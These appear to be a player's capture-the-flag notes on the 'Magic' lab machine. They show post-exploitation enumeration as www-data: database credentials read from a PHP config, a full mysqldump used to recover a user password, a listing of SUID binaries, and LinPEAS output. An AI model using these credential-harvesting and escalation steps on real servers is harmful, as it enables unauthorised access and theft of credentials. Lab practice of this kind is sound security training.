3 box enum www-data
www-data@ubuntu:/var/www/Magic$ cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
# mysql is not installed?
# tried su didnt work
www-data@ubuntu:/tmp$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash
# mysqldump exists
www-data@ubuntu:/tmp$ mysqldump -u theseus -p --all-databases> dump.mysql
# from dump.mysql
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
# theseus:Th3s3usW4sK1ng works
SuidEnum
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/bin/sysinfo
------------------------------
ls -la /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo
# we need to become theseus to use SUID
PEAS
╣ Sudo version
Sudo version 1.8.21p2
# tried; not exploitable
╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
org.gnome.DisplayManager 1082 gdm3 root :1.18 gdm.service - -
-- UID=0 EUID=0
╣ Active Ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
╣ Users with console
root:x:0:0:root:/root:/bin/bash
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
Last updated